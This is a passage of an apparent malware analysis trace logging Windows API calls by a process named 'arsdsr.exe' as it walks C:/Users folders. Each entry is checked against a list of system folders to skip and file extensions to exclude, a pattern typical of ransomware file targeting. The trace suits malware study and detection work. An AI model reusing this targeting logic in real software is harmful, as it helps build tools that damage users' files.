nFileSizeLow=0xf8, dwReserved0=0x295e53c, dwReserved1=0x7f6c43c1, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 0 [0153.519] FindClose (in: hFindFile=0x544610 | out: hFindFile=0x544610) returned 1 [0153.520] FindNextFileW (in: hFindFile=0x544690, lpFindFileData=0x295ec18 | out: lpFindFileData=0x295ec18*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x30702f92, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x30702f92, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x30702f92, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x295f6f0, cFileName="SendTo", cAlternateFileName="")) returned 1 [0153.520] lstrcmpiW (lpString1="SendTo", lpString2=".") returned 1 [0153.520] lstrcmpiW (lpString1="SendTo", lpString2="..") returned 1 [0153.520] lstrcmpiW (lpString1="SendTo", lpString2="...") returned 1 [0153.520] lstrcmpiW (lpString1="SendTo", lpString2="windows") returned -1 [0153.520] lstrcmpiW (lpString1="SendTo", lpString2="$recycle.bin") returned 1 [0153.520] lstrcmpiW (lpString1="SendTo", lpString2="rsa") returned 1 [0153.520] lstrcmpiW (lpString1="SendTo", lpString2="ntuser.dat") returned 1 [0153.520] lstrcmpiW (lpString1="SendTo", lpString2="programdata") returned 1 [0153.520] lstrcmpiW (lpString1="SendTo", lpString2="appdata") returned 1 [0153.520] lstrcmpiW (lpString1="SendTo", lpString2="program files") returned 1 [0153.520] lstrcmpiW (lpString1="SendTo", lpString2="program files (x86)") returned 1 [0153.520] lstrcpyW (in: lpString1=0x295ee68, lpString2="C:/Users\\Default\\" | out: lpString1="C:/Users\\Default\\") returned="C:/Users\\Default\\" [0153.521] lstrcatW (in: lpString1="C:/Users\\Default\\", lpString2="SendTo" | out: lpString1="C:/Users\\Default\\SendTo") returned="C:/Users\\Default\\SendTo" [0153.521] lstrcatW (in: lpString1="C:/Users\\Default\\SendTo", lpString2="\\" | out: lpString1="C:/Users\\Default\\SendTo\\") returned="C:/Users\\Default\\SendTo\\" [0153.521] lstrcpyW (in: lpString1=0x295e9f0, lpString2="C:/Users\\Default\\SendTo\\" | out: lpString1="C:/Users\\Default\\SendTo\\") returned="C:/Users\\Default\\SendTo\\" [0153.521] lstrcatW (in: lpString1="C:/Users\\Default\\SendTo\\", lpString2="*.*" | out: lpString1="C:/Users\\Default\\SendTo\\*.*") returned="C:/Users\\Default\\SendTo\\*.*" [0153.521] FindFirstFileW (in: lpFileName="C:/Users\\Default\\SendTo\\*.*", lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99b37d1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0x295e53c, dwReserved1=0x7f6c43c1, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 0xffffffff [0153.521] FindNextFileW (in: hFindFile=0x544690, lpFindFileData=0x295ec18 | out: lpFindFileData=0x295ec18*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x30702f92, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x30702f92, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x30702f92, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x295f6f0, cFileName="Start Menu", cAlternateFileName="STARTM~1")) returned 1 [0153.521] lstrcmpiW (lpString1="Start Menu", lpString2=".") returned 1 [0153.521] lstrcmpiW (lpString1="Start Menu", lpString2="..") returned 1 [0153.521] lstrcmpiW (lpString1="Start Menu", lpString2="...") returned 1 [0153.521] lstrcmpiW (lpString1="Start Menu", lpString2="windows") returned -1 [0153.521] lstrcmpiW (lpString1="Start Menu", lpString2="$recycle.bin") returned 1 [0153.521] lstrcmpiW (lpString1="Start Menu", lpString2="rsa") returned 1 [0153.521] lstrcmpiW (lpString1="Start Menu", lpString2="ntuser.dat") returned 1 [0153.521] lstrcmpiW (lpString1="Start Menu", lpString2="programdata") returned 1 [0153.521] lstrcmpiW (lpString1="Start Menu", lpString2="appdata") returned 1 [0153.521] lstrcmpiW (lpString1="Start Menu", lpString2="program files") returned 1 [0153.521] lstrcmpiW (lpString1="Start Menu", lpString2="program files (x86)") returned 1 [0153.521] lstrcpyW (in: lpString1=0x295ee68, lpString2="C:/Users\\Default\\" | out: lpString1="C:/Users\\Default\\") returned="C:/Users\\Default\\" [0153.521] lstrcatW (in: lpString1="C:/Users\\Default\\", lpString2="Start Menu" | out: lpString1="C:/Users\\Default\\Start Menu") returned="C:/Users\\Default\\Start Menu" [0153.521] lstrcatW (in: lpString1="C:/Users\\Default\\Start Menu", lpString2="\\" | out: lpString1="C:/Users\\Default\\Start Menu\\") returned="C:/Users\\Default\\Start Menu\\" [0153.521] lstrcpyW (in: lpString1=0x295e9f0, lpString2="C:/Users\\Default\\Start Menu\\" | out: lpString1="C:/Users\\Default\\Start Menu\\") returned="C:/Users\\Default\\Start Menu\\" [0153.522] lstrcatW (in: lpString1="C:/Users\\Default\\Start Menu\\", lpString2="*.*" | out: lpString1="C:/Users\\Default\\Start Menu\\*.*") returned="C:/Users\\Default\\Start Menu\\*.*" [0153.522] FindFirstFileW (in: lpFileName="C:/Users\\Default\\Start Menu\\*.*", lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99b37d1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0x295e53c, dwReserved1=0x7f6c43c1, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 0xffffffff [0153.522] FindNextFileW (in: hFindFile=0x544690, lpFindFileData=0x295ec18 | out: lpFindFileData=0x295ec18*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x30702f92, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x30702f92, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x30702f92, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x295f6f0, cFileName="Templates", cAlternateFileName="TEMPLA~1")) returned 1 [0153.522] lstrcmpiW (lpString1="Templates", lpString2=".") returned 1 [0153.522] lstrcmpiW (lpString1="Templates", lpString2="..") returned 1 [0153.522] lstrcmpiW (lpString1="Templates", lpString2="...") returned 1 [0153.522] lstrcmpiW (lpString1="Templates", lpString2="windows") returned -1 [0153.522] lstrcmpiW (lpString1="Templates", lpString2="$recycle.bin") returned 1 [0153.522] lstrcmpiW (lpString1="Templates", lpString2="rsa") returned 1 [0153.522] lstrcmpiW (lpString1="Templates", lpString2="ntuser.dat") returned 1 [0153.522] lstrcmpiW (lpString1="Templates", lpString2="programdata") returned 1 [0153.522] lstrcmpiW (lpString1="Templates", lpString2="appdata") returned 1 [0153.522] lstrcmpiW (lpString1="Templates", lpString2="program files") returned 1 [0153.522] lstrcmpiW (lpString1="Templates", lpString2="program files (x86)") returned 1 [0153.522] lstrcpyW (in: lpString1=0x295ee68, lpString2="C:/Users\\Default\\" | out: lpString1="C:/Users\\Default\\") returned="C:/Users\\Default\\" [0153.522] lstrcatW (in: lpString1="C:/Users\\Default\\", lpString2="Templates" | out: lpString1="C:/Users\\Default\\Templates") returned="C:/Users\\Default\\Templates" [0153.522] lstrcatW (in: lpString1="C:/Users\\Default\\Templates", lpString2="\\" | out: lpString1="C:/Users\\Default\\Templates\\") returned="C:/Users\\Default\\Templates\\" [0153.522] lstrcpyW (in: lpString1=0x295e9f0, lpString2="C:/Users\\Default\\Templates\\" | out: lpString1="C:/Users\\Default\\Templates\\") returned="C:/Users\\Default\\Templates\\" [0153.522] lstrcatW (in: lpString1="C:/Users\\Default\\Templates\\", lpString2="*.*" | out: lpString1="C:/Users\\Default\\Templates\\*.*") returned="C:/Users\\Default\\Templates\\*.*" [0153.522] FindFirstFileW (in: lpFileName="C:/Users\\Default\\Templates\\*.*", lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99b37d1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0x295e53c, dwReserved1=0x7f6c43c1, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 0xffffffff [0153.523] FindNextFileW (in: hFindFile=0x544690, lpFindFileData=0x295ec18 | out: lpFindFileData=0x295ec18*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd8868f0a, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x295f6f0, cFileName="Videos", cAlternateFileName="")) returned 1 [0153.523] lstrcmpiW (lpString1="Videos", lpString2=".") returned 1 [0153.523] lstrcmpiW (lpString1="Videos", lpString2="..") returned 1 [0153.523] lstrcmpiW (lpString1="Videos", lpString2="...") returned 1 [0153.523] lstrcmpiW (lpString1="Videos", lpString2="windows") returned -1 [0153.523] lstrcmpiW (lpString1="Videos", lpString2="$recycle.bin") returned 1 [0153.523] lstrcmpiW (lpString1="Videos", lpString2="rsa") returned 1 [0153.523] lstrcmpiW (lpString1="Videos", lpString2="ntuser.dat") returned 1 [0153.523] lstrcmpiW (lpString1="Videos", lpString2="programdata") returned 1 [0153.523] lstrcmpiW (lpString1="Videos", lpString2="appdata") returned 1 [0153.523] lstrcmpiW (lpString1="Videos", lpString2="program files") returned 1 [0153.523] lstrcmpiW (lpString1="Videos", lpString2="program files (x86)") returned 1 [0153.523] lstrcpyW (in: lpString1=0x295ee68, lpString2="C:/Users\\Default\\" | out: lpString1="C:/Users\\Default\\") returned="C:/Users\\Default\\" [0153.523] lstrcatW (in: lpString1="C:/Users\\Default\\", lpString2="Videos" | out: lpString1="C:/Users\\Default\\Videos") returned="C:/Users\\Default\\Videos" [0153.523] lstrcatW (in: lpString1="C:/Users\\Default\\Videos", lpString2="\\" | out: lpString1="C:/Users\\Default\\Videos\\") returned="C:/Users\\Default\\Videos\\" [0153.523] lstrcpyW (in: lpString1=0x295e9f0, lpString2="C:/Users\\Default\\Videos\\" | out: lpString1="C:/Users\\Default\\Videos\\") returned="C:/Users\\Default\\Videos\\" [0153.523] lstrcatW (in: lpString1="C:/Users\\Default\\Videos\\", lpString2="*.*" | out: lpString1="C:/Users\\Default\\Videos\\*.*") returned="C:/Users\\Default\\Videos\\*.*" [0153.523] FindFirstFileW (in: lpFileName="C:/Users\\Default\\Videos\\*.*", lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd8868f0a, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x295e53c, dwReserved1=0x7f6c43c1, cFileName=".", cAlternateFileName="")) returned 0x544610 [0153.523] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0153.524] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd8868f0a, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x295e53c, dwReserved1=0x7f6c43c1, cFileName="..", cAlternateFileName="")) returned 1 [0153.524] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0153.524] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0153.524] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd8868f0a, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0x295e53c, dwReserved1=0x7f6c43c1, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0153.524] lstrcmpiW (lpString1="desktop.ini", lpString2=".") returned 1 [0153.524] lstrcmpiW (lpString1="desktop.ini", lpString2="..") returned 1 [0153.524] lstrcmpiW (lpString1="desktop.ini", lpString2="...") returned 1 [0153.524] lstrcmpiW (lpString1="desktop.ini", lpString2="windows") returned -1 [0153.524] lstrcmpiW (lpString1="desktop.ini", lpString2="$recycle.bin") returned 1 [0153.524] lstrcmpiW (lpString1="desktop.ini", lpString2="rsa") returned -1 [0153.524] lstrcmpiW (lpString1="desktop.ini", lpString2="ntuser.dat") returned -1 [0153.524] lstrcmpiW (lpString1="desktop.ini", lpString2="programdata") returned -1 [0153.524] lstrcmpiW (lpString1="desktop.ini", lpString2="appdata") returned 1 [0153.524] lstrcmpiW (lpString1="desktop.ini", lpString2="program files") returned -1 [0153.524] lstrcmpiW (lpString1="desktop.ini", lpString2="program files (x86)") returned -1 [0153.524] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\Default\\Videos\\" | out: lpString1="C:/Users\\Default\\Videos\\") returned="C:/Users\\Default\\Videos\\" [0153.524] lstrcatW (in: lpString1="C:/Users\\Default\\Videos\\", lpString2="desktop.ini" | out: lpString1="C:/Users\\Default\\Videos\\desktop.ini") returned="C:/Users\\Default\\Videos\\desktop.ini" [0153.524] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0153.524] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0153.524] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0153.524] lstrcmpiW (lpString1=".ini", lpString2=".exe") returned 1 [0153.524] lstrcmpiW (lpString1=".ini", lpString2=".log") returned -1 [0153.524] lstrcmpiW (lpString1=".ini", lpString2=".cab") returned 1 [0153.524] lstrcmpiW (lpString1=".ini", lpString2=".cmd") returned 1 [0153.524] lstrcmpiW (lpString1=".ini", lpString2=".com") returned 1 [0153.525] lstrcmpiW (lpString1=".ini", lpString2=".cpl") returned 1 [0153.525] lstrcmpiW (lpString1=".ini", lpString2=".ini") returned 0 [0153.525] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd8868f0a, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0x295e53c, dwReserved1=0x7f6c43c1, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0153.525] FindClose (in: hFindFile=0x544610 | out: hFindFile=0x544610) returned 1 [0153.525] FindNextFileW (in: hFindFile=0x544690, lpFindFileData=0x295ec18 | out: lpFindFileData=0x295ec18*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd8868f0a, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x295f6f0, cFileName="Videos", cAlternateFileName="")) returned 0 [0153.525] FindClose (in: hFindFile=0x544690 | out: hFindFile=0x544690) returned 1 [0153.525] FindNextFileW (in: hFindFile=0x5446d0, lpFindFileData=0x295f298 | out: lpFindFileData=0x295f298*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307290f2, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307290f2, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307290f2, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0xdd354335, cFileName="Default User", cAlternateFileName="DEFAUL~1")) returned 1 [0153.525] lstrcmpiW (lpString1="Default User", lpString2=".") returned 1 [0153.525] lstrcmpiW (lpString1="Default User", lpString2="..") returned 1 [0153.525] lstrcmpiW (lpString1="Default User", lpString2="...") returned 1 [0153.525] lstrcmpiW (lpString1="Default User", lpString2="windows") returned -1 [0153.525] lstrcmpiW (lpString1="Default User", lpString2="$recycle.bin") returned 1 [0153.525] lstrcmpiW (lpString1="Default User", lpString2="rsa") returned -1 [0153.525] lstrcmpiW (lpString1="Default User", lpString2="ntuser.dat") returned -1 [0153.525] lstrcmpiW (lpString1="Default User", lpString2="programdata") returned -1 [0153.525] lstrcmpiW (lpString1="Default User", lpString2="appdata") returned 1 [0153.525] lstrcmpiW (lpString1="Default User", lpString2="program files") returned -1 [0153.525] lstrcmpiW (lpString1="Default User", lpString2="program files (x86)") returned -1 [0153.525] lstrcpyW (in: lpString1=0x295f4e8, lpString2="C:/Users\\" | out: lpString1="C:/Users\\") returned="C:/Users\\" [0153.525] lstrcatW (in: lpString1="C:/Users\\", lpString2="Default User" | out: lpString1="C:/Users\\Default User") returned="C:/Users\\Default User" [0153.525] lstrcatW (in: lpString1="C:/Users\\Default User", lpString2="\\" | out: lpString1="C:/Users\\Default User\\") returned="C:/Users\\Default User\\" [0153.525] lstrcpyW (in: lpString1=0x295f070, lpString2="C:/Users\\Default User\\" | out: lpString1="C:/Users\\Default User\\") returned="C:/Users\\Default User\\" [0153.525] lstrcatW (in: lpString1="C:/Users\\Default User\\", lpString2="*.*" | out: lpString1="C:/Users\\Default User\\*.*") returned="C:/Users\\Default User\\*.*" [0153.525] FindFirstFileW (in: lpFileName="C:/Users\\Default User\\*.*", lpFindFileData=0x295ec18 | out: lpFindFileData=0x295ec18*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd8868f0a, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x295f6f0, cFileName="Videos", cAlternateFileName="")) returned 0xffffffff [0153.526] FindNextFileW (in: hFindFile=0x5446d0, lpFindFileData=0x295f298 | out: lpFindFileData=0x295f298*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x286e4016, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x286e4016, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28a4ffbc, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0xa0000003, dwReserved1=0xdd354335, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0153.526] lstrcmpiW (lpString1="desktop.ini", lpString2=".") returned 1 [0153.526] lstrcmpiW (lpString1="desktop.ini", lpString2="..") returned 1 [0153.526] lstrcmpiW (lpString1="desktop.ini", lpString2="...") returned 1 [0153.526] lstrcmpiW (lpString1="desktop.ini", lpString2="windows") returned -1 [0153.526] lstrcmpiW (lpString1="desktop.ini", lpString2="$recycle.bin") returned 1 [0153.526] lstrcmpiW (lpString1="desktop.ini", lpString2="rsa") returned -1 [0153.526] lstrcmpiW (lpString1="desktop.ini", lpString2="ntuser.dat") returned -1 [0153.526] lstrcmpiW (lpString1="desktop.ini", lpString2="programdata") returned -1 [0153.526] lstrcmpiW (lpString1="desktop.ini", lpString2="appdata") returned 1 [0153.526] lstrcmpiW (lpString1="desktop.ini", lpString2="program files") returned -1 [0153.526] lstrcmpiW (lpString1="desktop.ini", lpString2="program files (x86)") returned -1 [0153.526] lstrcpyW (in: lpString1=0x295f4e8, lpString2="C:/Users\\" | out: lpString1="C:/Users\\") returned="C:/Users\\" [0153.526] lstrcatW (in: lpString1="C:/Users\\", lpString2="desktop.ini" | out: lpString1="C:/Users\\desktop.ini") returned="C:/Users\\desktop.ini" [0153.526] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0153.526] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0153.526] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0153.526] lstrcmpiW (lpString1=".ini", lpString2=".exe") returned 1 [0153.526] lstrcmpiW (lpString1=".ini", lpString2=".log") returned -1 [0153.526] lstrcmpiW (lpString1=".ini", lpString2=".cab") returned 1 [0153.526] lstrcmpiW (lpString1=".ini", lpString2=".cmd") returned 1 [0153.526] lstrcmpiW (lpString1=".ini", lpString2=".com") returned 1 [0153.526] lstrcmpiW (lpString1=".ini", lpString2=".cpl") returned 1 [0153.527] lstrcmpiW (lpString1=".ini", lpString2=".ini") returned 0 [0153.527] FindNextFileW (in: hFindFile=0x5446d0, lpFindFileData=0x295f298 | out: lpFindFileData=0x295f298*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x917fa2ee, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x917fa2ee, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0xdd354335, cFileName="Public", cAlternateFileName="")) returned 1 [0153.527] lstrcmpiW (lpString1="Public", lpString2=".") returned 1 [0153.527] lstrcmpiW (lpString1="Public", lpString2="..") returned 1 [0153.527] lstrcmpiW (lpString1="Public", lpString2="...") returned 1 [0153.527] lstrcmpiW (lpString1="Public", lpString2="windows") returned -1 [0153.527] lstrcmpiW (lpString1="Public", lpString2="$recycle.bin") returned 1 [0153.527] lstrcmpiW (lpString1="Public", lpString2="rsa") returned -1 [0153.527] lstrcmpiW (lpString1="Public", lpString2="ntuser.dat") returned 1 [0153.527] lstrcmpiW (lpString1="Public", lpString2="programdata") returned 1 [0153.527] lstrcmpiW (lpString1="Public", lpString2="appdata") returned 1 [0153.527] lstrcmpiW (lpString1="Public", lpString2="program files") returned 1 [0153.527] lstrcmpiW (lpString1="Public", lpString2="program files (x86)") returned 1 [0153.527] lstrcpyW (in: lpString1=0x295f4e8, lpString2="C:/Users\\" | out: lpString1="C:/Users\\") returned="C:/Users\\" [0153.527] lstrcatW (in: lpString1="C:/Users\\", lpString2="Public" | out: lpString1="C:/Users\\Public") returned="C:/Users\\Public" [0153.527] lstrcatW (in: lpString1="C:/Users\\Public", lpString2="\\" | out: lpString1="C:/Users\\Public\\") returned="C:/Users\\Public\\" [0153.527] lstrcpyW (in: lpString1=0x295f070, lpString2="C:/Users\\Public\\" | out: lpString1="C:/Users\\Public\\") returned="C:/Users\\Public\\" [0153.527] lstrcatW (in: lpString1="C:/Users\\Public\\", lpString2="*.*" | out: lpString1="C:/Users\\Public\\*.*") returned="C:/Users\\Public\\*.*" [0153.527] FindFirstFileW (in: lpFileName="C:/Users\\Public\\*.*", lpFindFileData=0x295ec18 | out: lpFindFileData=0x295ec18*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x917fa2ee, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x917fa2ee, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x295f6f0, cFileName=".", cAlternateFileName="")) returned 0x544690 [0153.527] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0153.527] FindNextFileW (in: hFindFile=0x544690, lpFindFileData=0x295ec18 | out: lpFindFileData=0x295ec18*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x917fa2ee, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x917fa2ee, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x295f6f0, cFileName="..", cAlternateFileName="")) returned 1 [0153.528] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0153.528] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0153.528] FindNextFileW (in: hFindFile=0x544690, lpFindFileData=0x295ec18 | out: lpFindFileData=0x295ec18*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xb0a09a40, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb0a09a40, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x295f6f0, cFileName="Desktop", cAlternateFileName="")) returned 1 [0153.528] lstrcmpiW (lpString1="Desktop", lpString2=".") returned 1 [0153.528] lstrcmpiW (lpString1="Desktop", lpString2="..") returned 1 [0153.528] lstrcmpiW (lpString1="Desktop", lpString2="...") returned 1 [0153.528] lstrcmpiW (lpString1="Desktop", lpString2="windows") returned -1 [0153.528] lstrcmpiW (lpString1="Desktop", lpString2="$recycle.bin") returned 1 [0153.528] lstrcmpiW (lpString1="Desktop", lpString2="rsa") returned -1 [0153.528] lstrcmpiW (lpString1="Desktop", lpString2="ntuser.dat") returned -1 [0153.528] lstrcmpiW (lpString1="Desktop", lpString2="programdata") returned -1 [0153.528] lstrcmpiW (lpString1="Desktop", lpString2="appdata") returned 1 [0153.528] lstrcmpiW (lpString1="Desktop", lpString2="program files") returned -1 [0153.528] lstrcmpiW (lpString1="Desktop", lpString2="program files (x86)") returned -1 [0153.528] lstrcpyW (in: lpString1=0x295ee68, lpString2="C:/Users\\Public\\" | out: lpString1="C:/Users\\Public\\") returned="C:/Users\\Public\\" [0153.528] lstrcatW (in: lpString1="C:/Users\\Public\\", lpString2="Desktop" | out: lpString1="C:/Users\\Public\\Desktop") returned="C:/Users\\Public\\Desktop" [0153.528] lstrcatW (in: lpString1="C:/Users\\Public\\Desktop", lpString2="\\" | out: lpString1="C:/Users\\Public\\Desktop\\") returned="C:/Users\\Public\\Desktop\\" [0153.528] lstrcpyW (in: lpString1=0x295e9f0, lpString2="C:/Users\\Public\\Desktop\\" | out: lpString1="C:/Users\\Public\\Desktop\\") returned="C:/Users\\Public\\Desktop\\" [0153.528] lstrcatW (in: lpString1="C:/Users\\Public\\Desktop\\", lpString2="*.*" | out: lpString1="C:/Users\\Public\\Desktop\\*.*") returned="C:/Users\\Public\\Desktop\\*.*" [0153.528] FindFirstFileW (in: lpFileName="C:/Users\\Public\\Desktop\\*.*", lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xb0a09a40, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb0a09a40, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x280026, dwReserved1=0x295f070, cFileName=".", cAlternateFileName="")) returned 0x544610 [0153.528] 